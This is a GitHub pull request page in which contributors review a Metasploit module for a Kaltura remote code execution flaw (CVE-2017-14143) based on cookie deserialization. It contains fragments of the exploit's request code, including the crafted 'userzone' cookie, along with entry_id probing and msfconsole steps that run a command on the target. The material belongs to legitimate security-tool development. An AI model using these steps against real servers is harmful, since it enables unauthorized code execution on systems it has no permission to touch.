-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143) #9114
Conversation
It's awesome to see that people continue the work and pick up the flag from where we left it. |
|
||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Use vars_get
for GET parameters.
Use normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries')
format. normalize_uri
will concatenate them for you.
Example: #8980
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Using the 'keditorservices,getAllEntries'
syntax did not work, but 'keditorservices', 'getAllEntries'
did.
Personally I do not find this cleaner than 'index.php/keditorservices/getAllEntries'
, but I will stick with the (slightly adjusted) suggestion from you now.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Oh, I guess it was a typo ;)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, it was typo sorry. Also, this was what maintainers suggested to me when I send my first PR ;)
|
||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Same here.
Use vars_get
for GET parameters.
Use normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries')
format. normalize_uri
will concatenate them for you.
Example: #8980
if res and res.redirect? | ||
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}") | ||
elsif res and res.code != 200 | ||
print_error("Unexpected response...") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Use single quote. print_error('Unexpected response...')
) | ||
end | ||
|
||
def check |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
As far as I can understand, you need to use valid entry_id. So why don't you directly send HTTP request to the [target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l
and look for 0_28bwo20l
at the returned XML file.
Valid entryid:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l
Response
<assets>
<asset id="0_28bwo20l" name="PAISD Mobile App Video" media_type="1" kshow_id="0_duymlto7" url="/content/entry/data/4/278/0_28bwo20l_" ready="1" thumbnail_path="/content/entry/thumbnail/4/278/0_28bwo20l_100001.jpg" credit="rpicon" source_link="file:/opt/kaltura/web/content/uploads/8221424122327.1663_1wfwuh0mo0wck8ccgokg.mov_.mov" duration="283" list_type="show" contributor_screen_name="ANONYMOUS"/>
</assets>
Unvalid entryid:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_ffffffff
response
<assets>
</assets>
Also adding module documentation to this PR would be awesome. |
@@ -85,12 +89,29 @@ def check | |||
Exploit::CheckCode::Safe | |||
elsif res && res.body.include?(r) | |||
Exploit::CheckCode::Vulnerable | |||
elsif not self.check_entryid() |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Do you really need to use self
and ()
in here ? I sense python developer in here :-)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Shouldn't we check validity of entry_id way before ? I would call check_entryid
at the very beginning of check
and exploit
functions.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I want to keep the number of requests as low as possible, so check
should only test for an invalid id if the request before failed and exploit
should not check for a valid id every time a call is made. I'll remove the self.
and ()
.
'vars_get' => { | ||
'list_type' => '15', | ||
'entry_id' => entry_id | ||
}, | ||
'headers' => { | ||
'Cookie' => "userzone=#{encoded}#{hash}" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Instead of defining cookie within headers, you could directly use it as a parameter of send_request_cgi method.
Example
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'blabla'),
'cookie' => cookie
})
Hi there; would you please add documentation to this PR? You can see more about it here: https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation |
@bwatters-r7 Where should I attach documentation for this PR? |
@Pushpamk, please add a separate markdown document as specified in the guidance:
|
Sorry, I'm late to the party. I see @Pushpamk already made a new PR for this, awesome! Is there still something needed from me? |
@rverton no worries; I love to see the community coming together! I have not gotten a chance to dig too much into this, but a quick run of rubocop (https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop) shows there are some stylistic hiccups in the code that could stand updates. The only thing I saw that I'd say has to change is some indention mix-ups around line 142. If you get a chance, please check out that wiki article and run the code through rubocop for some stylistic changes. Not everything rubocop flags needs to be changed, as the document states, but I do take rubocop's suggestions to heart when I can. Otherwise, this just needs me to finish up some other tasks so it comes up in my queue. Thanks! |
@bwatters-r7 all right, I just added the stylistic things suggested from rubocop. I hope this fits better now ;) |
I ran through https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md to try and install kaltura, but it failed both times, probably because I'm unfamiliar with the application. Is there an easier/faster installer around? |
Setting up kaltura was time-consuming. I failed several times until I noticed that you need to have a good amount of memory available, otherwise it will fail with strange error messages during the installation. The setup script is also error prone. I don't have a faster way to install, sorry :/ |
When you say "a good amount," can you quantify that? 1GB, 8 GB? 32 GB? |
A 512MB VM failed for me, a 2GB one worked. |
If you have a pcap of this working, please send it in. I have not had time to try building Kaltura again. |
Hi @bwatters-r7, This is the execution:
I also attached a tcpdump: |
Thanks, @rverton! Likely not going to get to it this week, but I will try to review it next week. |
Merge branch 'land-9114' into upstream-master
Release NotesThe exploits/linux/http/kaltura_unserialize_cookie_rce module has been added to the framework. It allows remote code execution through Kaltura video server software versions prior to 13.1.0. A valid entry_id is required for this exploit, and can be obtained from any media resource published on the kaltura installation. |
Merge branch 'land-9114' into upstream-master
Merge branch 'land-9114' into upstream-master
This PR adds a module to exploit the Kaltura <= 13.1.0 RCE via a cookie deserialization.
Verification example
msfconsole
use exploit/linux/http/kaltura_unserialize_cookie_rce
set RHOST host.com
set ENTRYID 0_kzn07urz
set payload generic/custom
set payloadstr "system('uname -a');"
run